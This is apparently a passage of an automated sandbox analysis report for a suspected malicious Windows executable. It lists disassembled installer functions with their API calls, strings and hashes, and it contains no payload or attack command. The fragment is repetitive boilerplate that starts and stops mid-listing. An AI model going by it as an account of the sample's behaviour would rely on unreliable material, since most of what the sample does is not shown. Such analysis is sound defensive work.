                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062E9
                                                    • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
                                                    • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                                  • API String ID: 2171350718-3350566011
                                                  • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                  • Instruction ID: 1eba4fe57778a2caeea4241fd1a0165fec623ab6fc85672a9c0ceb4c44b2574e
                                                  • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                  • Instruction Fuzzy Hash: CC312470600715BBD2207B619D49F6B3B5CDF82744F16017EFA02B62C2EA7DD820867D
                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                  • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                                  • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                  • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                                  Function 00406571 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(007A6200,00000400), ref: 00406693
                                                  • GetWindowsDirectoryW.KERNEL32(007A6200,00000400,00000000,007A0728,?,?,00000000,00000000,0079B1EE,762323A0), ref: 004066A9
                                                  • SHGetPathFromIDListW.SHELL32(00000000,007A6200), ref: 00406707
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406710
                                                  • lstrcatW.KERNEL32(007A6200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040673B
                                                  • lstrlenW.KERNEL32(007A6200,00000000,007A0728,?,?,00000000,00000000,0079B1EE,762323A0), ref: 00406795
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406664
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406735
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-730719616
                                                  • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                  • Instruction ID: 3bd779c8658dd38474262f04f34df11dc98fe6ff926310c24388666a45315c92
                                                  • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                  • Instruction Fuzzy Hash: 4C6123716046019BD720AF24DD80B6A77E8AB95318F25063FF687B33D1DA3C8961875E
                                                  Function 0040451A Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404537
                                                  • GetSysColor.USER32(00000000), ref: 00404575
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404581
                                                  • SetBkMode.GDI32(?,?), ref: 0040458D
                                                  • GetSysColor.USER32(?), ref: 004045A0
                                                  • SetBkColor.GDI32(?,?), ref: 004045B0
                                                  • DeleteObject.GDI32(?), ref: 004045CA
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: fafa423c3d5d8bdb364a41ac4aaa45114b780d6afda8d36e4a103189301150f1
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: 242153B1500704ABCB359F39DD08A5B7BF8BF41714F14892EEB96A22E0D738E944CB54
                                                  Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                    • Part of subcall function 00406105: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D6,00000000,00000000,?,00000000,00000011), ref: 0040611B
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                                                  • Instruction ID: ad829204a8421b16aaf2dc4ab9086753538d66bd122375994c0f550e7c4a5b44
                                                  • Opcode Fuzzy Hash: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                                                  • Instruction Fuzzy Hash: 8551FA75D0411AABDF24DF94CA84AAEBBB9FF04344F10817BE941B62D0D7B49D82CB58
                                                  Function 004055B9 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                  • lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                  • lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                  • SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                  • Instruction ID: 2aa9806f2f20795f51ccdab708f13b580d3c68b3f08286e5c277b3a8c7657607
                                                  • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                  • Instruction Fuzzy Hash: 9F21A175900518BACF119F65DD44ADFBFB9EF85354F10843AF904B22A0C7794A40CFA8
                                                  Function 004067E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                                                  • CharNextW.USER32(?,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                                                  • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-826357637
                                                  • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction ID: 1b09f5ceaf5ae9834212bd1c7625b2fa446eb07de75e5307cf61d1a9d5c412e4
                                                  • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction Fuzzy Hash: F411C46780221295DB303B54CC44AB7A2A8EF94790F52C43FED8A732C0E77C5C9286BD
                                                  Function 00404E6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E89
                                                  • GetMessagePos.USER32 ref: 00404E91
                                                  • ScreenToClient.USER32(?,?), ref: 00404EAB
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EBD
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 5c8f3b82e3fec6324f9bbbe2439b20c808b00c1b0a410ced479a2b1fdaf2ea9b
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: 58015E7290021DBADB00DB94DD85FFEBBBCAF95711F10412BBA51B61D0D7B49A018BA4
                                                  Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                  • MulDiv.KERNEL32(000DC6D3,00000064,000DC6D7), ref: 00402FE1
                                                  • wsprintfW.USER32 ref: 00402FF1
                                                  • SetWindowTextW.USER32(?,?), ref: 00403001
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402FEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                  • Instruction ID: ee21eaa8db301b2ce928a6645e07ba1980cadc5c51e80129ae912554bbca5152
                                                  • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                  • Instruction Fuzzy Hash: 70014F7064020DBBEF209F60DE4AFAE3B79AB04344F108039FA12A51D0DBB99A559B58
                                                  Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                  • Instruction ID: c874634495a4b446fb751942016c9e5cc597fe9d4aaee657827b690e02a6ad76
                                                  • Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                  • Instruction Fuzzy Hash: 0231AF71D00128ABCF21AFA5CE49D9E7EB9AF45324F10423AF551762E1CB794C419FA8
                                                  Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction ID: f4e9f9df98694428ddab884ff763f6d95bd8863eb2dee119fedf423c13c251a9
                                                  • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction Fuzzy Hash: F4216B7150010ABFDF119F90CE89EEF7B7DEB54388F100076B949B11E0D7B49E54AA68
                                                  Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                  • GetClientRect.USER32(?,?), ref: 00401DEA
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
